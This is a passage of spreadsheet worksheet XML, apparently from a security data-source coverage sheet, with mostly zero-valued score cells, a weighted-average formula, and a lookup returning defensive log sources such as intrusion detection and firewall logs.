      <c r="D245" s="45"/>
      <c r="E245" s="45"/>
      <c r="F245" s="14">
        <v>0</v>
      </c>
      <c r="G245" s="14">
        <v>0</v>
      </c>
      <c r="H245" s="14">
        <v>0</v>
      </c>
      <c r="I245" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K245" s="46" t="str">
        <f>LOOKUP(A245,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
    </row>
    <row r="246" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A246" s="43" t="s">
        <v>376</v>
      </c>
      <c r="F246" s="14">
        <v>0</v>
      </c>
      <c r="G246" s="14">
        <v>0</v>
      </c>
      <c r="H246" s="14">
        <v>0</v>
      </c>
      <c r="I246" s="32">
        <f t="shared" ref="I246:I267" si="6">((F246*2)+G246+(H246*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="247" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A247" s="43" t="s">
        <v>377</v>
      </c>
      <c r="F247" s="14">
        <v>0</v>
      </c>
      <c r="G247" s="14">
        <v>0</v>
      </c>
      <c r="H247" s="14">
        <v>0</v>
      </c>
      <c r="I247" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="248" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A248" s="43" t="s">
        <v>378</v>
      </c>
      <c r="F248" s="14">
        <v>0</v>
      </c>
      <c r="G248" s="14">
        <v>0</v>
      </c>
      <c r="H248" s="14">
        <v>0</v>
      </c>
      <c r="I248" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="249" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A249" s="43" t="s">
        <v>379</v>
      </c>
      <c r="F249" s="14">
        <v>0</v>
      </c>
      <c r="G249" s="14">
        <v>0</v>
      </c>
      <c r="H249" s="14">
        <v>0</v>
      </c>
      <c r="I249" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="250" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A250" s="43" t="s">
        <v>380</v>
      </c>
      <c r="F250" s="14">
        <v>0</v>
      </c>
      <c r="G250" s="14">
        <v>0</v>
      </c>
      <c r="H250" s="14">
        <v>0</v>
      </c>
      <c r="I250" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="251" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A251" s="43" t="s">
        <v>381</v>
      </c>
      <c r="F251" s="14">
        <v>0</v>
      </c>
      <c r="G251" s="14">
        <v>0</v>
      </c>
      <c r="H251" s="14">
        <v>0</v>
      </c>
      <c r="I251" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="252" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A252" s="43" t="s">
        <v>382</v>
      </c>
      <c r="F252" s="14">
        <v>0</v>
      </c>
      <c r="G252" s="14">
        <v>0</v>
      </c>
      <c r="H252" s="14">
        <v>0</v>
      </c>
      <c r="I252" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="253" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A253" s="43" t="s">
        <v>383</v>
      </c>
      <c r="F253" s="14">
        <v>0</v>
      </c>
      <c r="G253" s="14">
        <v>0</v>
      </c>
      <c r="H253" s="14">
        <v>0</v>
      </c>
      <c r="I253" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="254" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A254" s="43" t="s">
        <v>384</v>
      </c>
      <c r="F254" s="14">
        <v>0</v>
      </c>
      <c r="G254" s="14">
        <v>0</v>
      </c>
      <c r="H254" s="14">
        <v>0</v>
      </c>
      <c r="I254" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="255" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A255" s="43" t="s">
        <v>385</v>
      </c>
      <c r="F255" s="14">
        <v>0</v>
      </c>
      <c r="G255" s="14">
        <v>0</v>
      </c>
      <c r="H255" s="14">
        <v>0</v>
      </c>
      <c r="I255" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="256" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A256" s="43" t="s">
        <v>386</v>
      </c>
      <c r="F256" s="14">
        <v>0</v>
      </c>
      <c r="G256" s="14">
        <v>0</v>
      </c>
      <c r="H256" s="14">
        <v>0</v>
      </c>
      <c r="I256" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="257" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A257" s="43" t="s">
        <v>387</v>
      </c>
      <c r="F257" s="14">
        <v>0</v>
      </c>
      <c r="G257" s="14">
        <v>0</v>
      </c>
      <c r="H257" s="14">
        <v>0</v>
      </c>
      <c r="I257" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="258" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A258" s="43" t="s">
        <v>388</v>
      </c>
      <c r="F258" s="14">
        <v>0</v>
      </c>
      <c r="G258" s="14">
        <v>0</v>
      </c>
      <c r="H258" s="14">
        <v>0</v>
      </c>
      <c r="I258" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="259" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A259" s="43" t="s">
        <v>389</v>
      </c>
      <c r="F259" s="14">
        <v>0</v>
      </c>
      <c r="G259" s="14">
        <v>0</v>
      </c>
      <c r="H259" s="14">
        <v>0</v>
      </c>
      <c r="I259" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="260" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A260" s="43" t="s">
        <v>390</v>
      </c>
      <c r="F260" s="14">
        <v>0</v>
      </c>
      <c r="G260" s="14">
        <v>0</v>
      </c>
      <c r="H260" s="14">
        <v>0</v>
      </c>
      <c r="I260" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="261" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A261" s="43" t="s">
        <v>391</v>
      </c>
      <c r="F261" s="14">
        <v>0</v>
      </c>
      <c r="G261" s="14">
        <v>0</v>
      </c>
      <c r="H261" s="14">
        <v>0</v>
      </c>
      <c r="I261" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="262" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A262" s="43" t="s">
        <v>392</v>
      </c>
      <c r="F262" s="14">
        <v>0</v>
      </c>
      <c r="G262" s="14">
        <v>0</v>
      </c>
      <c r="H262" s="14">
        <v>0</v>
      </c>
      <c r="I262" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="263" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A263" s="43" t="s">
        <v>393</v>
      </c>
      <c r="F263" s="14">
        <v>0</v>
      </c>
      <c r="G263" s="14">
        <v>0</v>
      </c>
      <c r="H263" s="14">
        <v>0</v>
      </c>
      <c r="I263" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="264" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A264" s="43" t="s">
        <v>394</v>
      </c>
      <c r="F264" s="14">
        <v>0</v>
      </c>
      <c r="G264" s="14">
        <v>0</v>
      </c>
      <c r="H264" s="14">
        <v>0</v>
      </c>
      <c r="I264" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="265" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A265" s="43" t="s">
        <v>396</v>
      </c>
      <c r="F265" s="14">
        <v>0</v>
      </c>
      <c r="G265" s="14">
        <v>0</v>
      </c>
      <c r="H265" s="14">
        <v>0</v>
      </c>
      <c r="I265" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="266" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A266" s="43" t="s">
        <v>397</v>
      </c>
      <c r="F266" s="14">
        <v>0</v>
      </c>
      <c r="G266" s="14">
        <v>0</v>
      </c>
      <c r="H266" s="14">
        <v>0</v>
      </c>
      <c r="I266" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="267" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A267" s="43" t="s">
        <v>399</v>
      </c>
      <c r="F267" s="14">
        <v>0</v>
      </c>
      <c r="G267" s="14">
        <v>0</v>
      </c>
      <c r="H267" s="14">
        <v>0</v>
      </c>
      <c r="I267" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="268" spans="1:9" x14ac:dyDescent="0.2">
      <c r="F268" s="14"/>
      <c r="G268" s="14"/>
      <c r="H268" s="14"/>
      <c r="I268" s="32"/>
    </row>
    <row r="269" spans="1:9" x14ac:dyDescent="0.2">
      <c r="F269" s="14"/>
      <c r="G269" s="14"/>
      <c r="H269" s="14"/>
      <c r="I269" s="15"/>
    </row>
    <row r="270" spans="1:9" x14ac:dyDescent="0.2">
      <c r="F270" s="14"/>
      <c r="G270" s="14"/>
      <c r="H270" s="14"/>
      <c r="I270" s="15"/>
    </row>
    <row r="271" spans="1:9" x14ac:dyDescent="0.2">
      <c r="F271" s="14"/>
      <c r="G271" s="14"/>
      <c r="H271" s="14"/>
      <c r="I271" s="15"/>
    </row>
    <row r="272" spans="1:9" x14ac:dyDescent="0.2">
      <c r="F272" s="14"/>
      <c r="G272" s="14"/>
      <c r="H272" s="14"/>
      <c r="I272" s="15"/>
    </row>
    <row r="273" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F273" s="14"/>
      <c r="G273" s="14"/>
      <c r="H273" s="14"/>
      <c r="I273" s="15"/>
    </row>
    <row r="274" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F274" s="14"/>
      <c r="G274" s="14"/>
      <c r="H274" s="14"/>
      <c r="I274" s="15"/>
    </row>
    <row r="275" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F275" s="14"/>
      <c r="G275" s="14"/>
      <c r="H275" s="14"/>
      <c r="I275" s="15"/>
    </row>
    <row r="276" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F276" s="14"/>
      <c r="G276" s="14"/>
      <c r="H276" s="14"/>
      <c r="I276" s="15"/>
    </row>
    <row r="277" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F277" s="14"/>
      <c r="G277" s="14"/>
      <c r="H277" s="14"/>
      <c r="I277" s="15"/>
    </row>
    <row r="278" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F278" s="14"/>
      <c r="G278" s="14"/>
      <c r="H278" s="14"/>
      <c r="I278" s="15"/>
    </row>
    <row r="279" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F279" s="14"/>
      <c r="G279" s="14"/>
      <c r="H279" s="14"/>
      <c r="I279" s="15"/>
    </row>
    <row r="280" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F280" s="14"/>
      <c r="G280" s="14"/>
      <c r="H280" s="14"/>
      <c r="I280" s="15"/>
    </row>
    <row r="281" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F281" s="14"/>
      <c r="G281" s="14"/>
      <c r="H281" s="14"/>
      <c r="I281" s="15"/>
    </row>
    <row r="282" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F282" s="14"/>
      <c r="G282" s="14"/>
      <c r="H282" s="14"/>
      <c r="I282" s="15"/>
    </row>
    <row r="283" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F283" s="14"/>
      <c r="G283" s="14"/>
      <c r="H283" s="14"/>
      <c r="I283" s="15"/>
    </row>
    <row r="284" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F284" s="14"/>
      <c r="G284" s="14"/>
      <c r="H284" s="14"/>
      <c r="I284" s="15"/>
    </row>
    <row r="285" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F285" s="14"/>
      <c r="G285" s="14"/>
      <c r="H285" s="14"/>
      <c r="I285" s="15"/>
    </row>
    <row r="286" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F286" s="14"/>
      <c r="G286" s="14"/>
      <c r="H286" s="14"/>
      <c r="I286" s="15"/>
    </row>
    <row r="287" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F287" s="14"/>
      <c r="G287" s="14"/>
      <c r="H287" s="14"/>
      <c r="I287" s="15"/>
    </row>
    <row r="288" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F288" s="14"/>
      <c r="G288" s="14"/>
      <c r="H288" s="14"/>
      <c r="I288" s="15"/>
    </row>
    <row r="289" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F289" s="14"/>
      <c r="G289" s="14"/>
      <c r="H289" s="14"/>
      <c r="I289" s="15"/>
    </row>
    <row r="290" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F290" s="14"/>
      <c r="G290" s="14"/>
      <c r="H290" s="14"/>
      <c r="I290" s="15"/>
    </row>
    <row r="291" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F291" s="14"/>
      <c r="G291" s="14"/>
      <c r="H291" s="14"/>
      <c r="I291" s="15"/>
    </row>
    <row r="292" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F292" s="14"/>
      <c r="G292" s="14"/>
      <c r="H292" s="14"/>
      <c r="I292" s="15"/>
    </row>
    <row r="293" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F293" s="14"/>
      <c r="G293" s="14"/>
      <c r="H293" s="14"/>
      <c r="I293" s="15"/>
    </row>
    <row r="294" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F294" s="14"/>
      <c r="G294" s="14"/>
      <c r="H294" s="14"/>
      <c r="I294" s="15"/>
    </row>
    <row r="295" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F295" s="14"/>
      <c r="G295" s="14"/>
      <c r="H295" s="14"/>
      <c r="I295" s="15"/>
    </row>
    <row r="296" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F296" s="14"/>
      <c r="G296" s="14"/>
      <c r="H296" s="14"/>
      <c r="I296" s="15"/>
    </row>
    <row r="297" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F297" s="14"/>
      <c r="G297" s="14"/>
      <c r="H297" s="14"/>
      <c r="I297" s="15"/>
    </row>
    <row r="298" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F298" s="14"/>
      <c r="G298" s="14"/>
      <c r="H298" s="14"/>
      <c r="I298" s="15"/>
    </row>
    <row r="299" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F299" s="14"/>
      <c r="G299" s="14"/>
      <c r="H299" s="14"/>
      <c r="I299" s="15"/>
    </row>
    <row r="300" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F300" s="14"/>
      <c r="G300" s="14"/>
      <c r="H300" s="14"/>
      <c r="I300" s="15"/>
    </row>
    <row r="301" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F301" s="14"/>
      <c r="G301" s="14"/>
      <c r="H301" s="14"/>
      <c r="I301" s="15"/>
    </row>
    <row r="302" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F302" s="14"/>
      <c r="G302" s="14"/>
      <c r="H302" s="14"/>
      <c r="I302" s="15"/>
    </row>
    <row r="303" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F303" s="14"/>
      <c r="G303" s="14"/>
      <c r="H303" s="14"/>
      <c r="I303" s="15"/>
    </row>
    <row r="304" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F304" s="14"/>
      <c r="G304" s="14"/>
      <c r="H304" s="14"/>
      <c r="I304" s="15"/>
    </row>
    <row r="305" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F305" s="14"/>
      <c r="G305" s="14"/>
      <c r="H305" s="14"/>
      <c r="I305" s="15"/>
    </row>
    <row r="306" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F306" s="14"/>
      <c r="G306" s="14"/>
      <c r="H306" s="14"/>
      <c r="I306" s="15"/>
    </row>
    <row r="307" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F307" s="14"/>
      <c r="G307" s="14"/>
      <c r="H307" s="14"/>
      <c r="I307" s="15"/>
    </row>
    <row r="308" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F308" s="14"/>
      <c r="G308" s="14"/>
      <c r="H308" s="14"/>
      <c r="I308" s="15"/>
    </row>
    <row r="309" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F309" s="14"/>
      <c r="G309" s="14"/>
      <c r="H309" s="14"/>
      <c r="I309" s="15"/>
    </row>
    <row r="310" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F310" s="14"/>
      <c r="G310" s="14"/>
      <c r="H310" s="14"/>
      <c r="I310" s="15"/>
    </row>
    <row r="311" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F311" s="14"/>
      <c r="G311" s="14"/>
      <c r="H311" s="14"/>
      <c r="I311" s="15"/>
    </row>
    <row r="312" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F312" s="14"/>
      <c r="G312" s="14"/>
      <c r="H312" s="14"/>
      <c r="I312" s="15"/>
    </row>
    <row r="313" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F313" s="14"/>
      <c r="G313" s="14"/>
      <c r="H313" s="14"/>
      <c r="I313" s="15"/>
    </row>
    <row r="314" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F314" s="14"/>
      <c r="G314" s="14"/>
      <c r="H314" s="14"/>
      <c r="I314" s="15"/>
    </row>
    <row r="315" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F315" s="14"/>
      <c r="G315" s="14"/>
      <c r="H315" s="14"/>
      <c r="I315" s="15"/>
    </row>
    <row r="316" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F316" s="14"/>
      <c r="G316" s="14"/>
      <c r="H316" s="14"/>
      <c r="I316" s="15"/>
    </row>
    <row r="317" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F317" s="14"/>
      <c r="G317" s="14"/>
      <c r="H317" s="14"/>
      <c r="I317" s="15"/>
    </row>
    <row r="318" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F318" s="14"/>
      <c r="G318" s="14"/>
      <c r="H318" s="14"/>
      <c r="I318" s="15"/>
    </row>
    <row r="319" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F319" s="14"/>
      <c r="G319" s="14"/>
      <c r="H319" s="14"/>
      <c r="I319" s="15"/>
    </row>
    <row r="320" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F320" s="14"/>
      <c r="G320" s="14"/>
      <c r="H320" s="14"/>
      <c r="I320" s="15"/>
    </row>
    <row r="321" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F321" s="14"/>
      <c r="G321" s="14"/>
      <c r="H321" s="14"/>
      <c r="I321" s="15"/>
    </row>
    <row r="322" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F322" s="14"/>
      <c r="G322" s="14"/>
      <c r="H322" s="14"/>
      <c r="I322" s="15"/>
    </row>
    <row r="323" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F323" s="14"/>
      <c r="G323" s="14"/>
      <c r="H323" s="14"/>
      <c r="I323" s="15"/>
    </row>
    <row r="324" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F324" s="14"/>
      <c r="G324" s="14"/>
      <c r="H324" s="14"/>
      <c r="I324" s="15"/>
    </row>
    <row r="325" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F325" s="14"/>
      <c r="G325" s="14"/>
      <c r="H325" s="14"/>
      <c r="I325" s="15"/>
    </row>
    <row r="326" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F326" s="14"/>
      <c r="G326" s="14"/>
      <c r="H326" s="14"/>
      <c r="I326" s="15"/>
    </row>
    <row r="327" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F327" s="14"/>
      <c r="G327" s="14"/>
      <c r="H327" s="14"/>
      <c r="I327" s="15"/>
    </row>
    <row r="328" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F328" s="14"/>
      <c r="G328" s="14"/>
      <c r="H328" s="14"/>
      <c r="I328" s="15"/>
    </row>
    <row r="329" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F329" s="14"/>
      <c r="G329" s="14"/>
      <c r="H329" s="14"/>
      <c r="I329" s="15"/>
    </row>
    <row r="330" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F330" s="14"/>
      <c r="G330" s="14"/>
      <c r="H330" s="14"/>
      <c r="I330" s="15"/>
    </row>
    <row r="331" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F331" s="14"/>
      <c r="G331" s="14"/>
      <c r="H331" s="14"/>
      <c r="I331" s="15"/>
    </row>
    <row r="332" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F332" s="14"/>
      <c r="G332" s="14"/>
      <c r="H332" s="14"/>
      <c r="I332" s="15"/>
    </row>
    <row r="333" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F333" s="14"/>
      <c r="G333" s="14"/>
      <c r="H333" s="14"/>
      <c r="I333" s="15"/>
    </row>
    <row r="334" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F334" s="14"/>
      <c r="G334" s="14"/>
      <c r="H334" s="14"/>
      <c r="I334" s="15"/>
    </row>
    <row r="335" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F335" s="14"/>
      <c r="G335" s="14"/>
      <c r="H335" s="14"/>
      <c r="I335" s="15"/>
    </row>
    <row r="336" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F336" s="14"/>
      <c r="G336" s="14"/>
      <c r="H336" s="14"/>
      <c r="I336" s="15"/>
    </row>
    <row r="337" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F337" s="14"/>
      <c r="G337" s="14"/>
      <c r="H337" s="14"/>
      <c r="I337" s="15"/>
    </row>
    <row r="338" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F338" s="14"/>
      <c r="G338" s="14"/>
      <c r="H338" s="14"/>
      <c r="I338" s="15"/>
    </row>
    <row r="339" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F339" s="14"/>
      <c r="G339" s="14"/>
      <c r="H339" s="14"/>
      <c r="I339" s="15"/>
    </row>
    <row r="340" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F340" s="14"/>
      <c r="G340" s="14"/>
      <c r="H340" s="14"/>
      <c r="I340" s="15"/>
    </row>
    <row r="341" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F341" s="14"/>
      <c r="G341" s="14"/>
      <c r="H341" s="14"/>
      <c r="I341" s="15"/>
    </row>
    <row r="342" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F342" s="14"/>
      <c r="G342" s="14"/>
      <c r="H342" s="14"/>
      <c r="I342" s="15"/>
    </row>
    <row r="343" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F343" s="14"/>
      <c r="G343" s="14"/>
      <c r="H343" s="14"/>
      <c r="I343" s="15"/>
    </row>
    <row r="344" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F344" s="14"/>
      <c r="G344" s="14"/>
      <c r="H344" s="14"/>
      <c r="I344" s="15"/>
    </row>
    <row r="345" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F345" s="14"/>
      <c r="G345" s="14"/>
      <c r="H345" s="14"/>
      <c r="I345" s="15"/>
    </row>
    <row r="346" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F346" s="14"/>
      <c r="G346" s="14"/>
      <c r="H346" s="14"/>
      <c r="I346" s="15"/>
    </row>
    <row r="347" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F347" s="14"/>
      <c r="G347" s="14"/>
      <c r="H347" s="14"/>
      <c r="I347" s="15"/>
    </row>
    <row r="348" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F348" s="14"/>
      <c r="G348" s="14"/>
      <c r="H348" s="14"/>
      <c r="I348" s="15"/>
    </row>
    <row r="349" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F349" s="14"/>
      <c r="G349" s="14"/>
      <c r="H349" s="14"/>
      <c r="I349" s="15"/>
    </row>
    <row r="350" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F350" s="14"/>
      <c r="G350" s="14"/>
      <c r="H350" s="14"/>
      <c r="I350" s="15"/>
    </row>
    <row r="351" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F351" s="14"/>
      <c r="G351" s="14"/>
      <c r="H351" s="14"/>
      <c r="I351" s="15"/>
    </row>
    <row r="352" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F352" s="14"/>
      <c r="G352" s="14"/>
      <c r="H352" s="14"/>
      <c r="I352" s="15"/>
    </row>
    <row r="353" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F353" s="14"/>
      <c r="G353" s="14"/>
      <c r="H353" s="14"/>
      <c r="I353" s="15"/>
    </row>
    <row r="354" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F354" s="14"/>
      <c r="G354" s="14"/>
      <c r="H354" s="14"/>
      <c r="I354" s="15"/>
    </row>
    <row r="355" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F355" s="14"/>
      <c r="G355" s="14"/>
      <c r="H355" s="14"/>
      <c r="I355" s="15"/>
    </row>
    <row r="356" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F356" s="14"/>
      <c r="G356" s="14"/>
      <c r="H356" s="14"/>
      <c r="I356" s="15"/>
    </row>
    <row r="357" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F357" s="14"/>
      <c r="G357" s="14"/>
      <c r="H357" s="14"/>
      <c r="I357" s="15"/>
    </row>
    <row r="358" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F358" s="14"/>
      <c r="G358" s="14"/>
      <c r="H358" s="14"/>
      <c r="I358" s="15"/>
    </row>
    <row r="359" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F359" s="14"/>
      <c r="G359" s="14"/>
      <c r="H359" s="14"/>
      <c r="I359" s="15"/>
    </row>
    <row r="360" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F360" s="14"/>
      <c r="G360" s="14"/>
      <c r="H360" s="14"/>
      <c r="I360" s="15"/>
    </row>
    <row r="361" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F361" s="14"/>
      <c r="G361" s="14"/>
      <c r="H361" s="14"/>
      <c r="I361" s="15"/>
    </row>
    <row r="362" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F362" s="14"/>
      <c r="G362" s="14"/>
      <c r="H362" s="14"/>
      <c r="I362" s="15"/>
    </row>
    <row r="363" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F363" s="14"/>
      <c r="G363" s="14"/>
      <c r="H363" s="14"/>
      <c r="I363" s="15"/>
    </row>
    <row r="364" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F364" s="14"/>
      <c r="G364" s="14"/>
      <c r="H364" s="14"/>
      <c r="I364" s="15"/>
    </row>
    <row r="365" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F365" s="14"/>
      <c r="G365" s="14"/>
      <c r="H365" s="14"/>
      <c r="I365" s="15"/>
    </row>
    <row r="366" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F366" s="14"/>
      <c r="G366" s="14"/>
      <c r="H366" s="14"/>
      <c r="I366" s="15"/>
    </row>
    <row r="367" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F367" s="14"/>
      <c r="G367" s="14"/>
      <c r="H367" s="14"/>
      <c r="I367" s="15"/>
    </row>
    <row r="368" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F368" s="14"/>
      <c r="G368" s="14"/>
      <c r="H368" s="14"/>
      <c r="I368" s="15"/>
    </row>
    <row r="369" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F369" s="14"/>
      <c r="G369" s="14"/>
      <c r="H369" s="14"/>
      <c r="I369" s="15"/>
    </row>
    <row r="370" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F370" s="14"/>
      <c r="G370" s="14"/>
      <c r="H370" s="14"/>
      <c r="I370" s="15"/>
    </row>
    <row r="371" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F371" s="14"/>
      <c r="G371" s="14"/>
      <c r="H371" s="14"/>
      <c r="I371" s="15"/>
    </row>
    <row r="372" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F372" s="14"/>
      <c r="G372" s="14"/>
      <c r="H372" s="14"/>
      <c r="I372" s="15"/>
    </row>
    <row r="373" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F373" s="14"/>
      <c r="G373" s="14"/>
      <c r="H373" s="14"/>
      <c r="I373" s="15"/>
    </row>
    <row r="374" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F374" s="14"/>
      <c r="G374" s="14"/>
      <c r="H374" s="14"/>
      <c r="I374" s="15"/>
    </row>
    <row r="375" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F375" s="14"/>
      <c r="G375" s="14"/>
      <c r="H375" s="14"/>
      <c r="I375" s="15"/>
    </row>
    <row r="376" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F376" s="14"/>
      <c r="G376" s="14"/>
      <c r="H376" s="14"/>
      <c r="I376" s="15"/>
    </row>
    <row r="377" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F377" s="14"/>
      <c r="G377" s="14"/>
      <c r="H377" s="14"/>
      <c r="I377" s="15"/>
    </row>
    <row r="378" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F378" s="14"/>
      <c r="G378" s="14"/>
      <c r="H378" s="14"/>
      <c r="I378" s="15"/>
    </row>
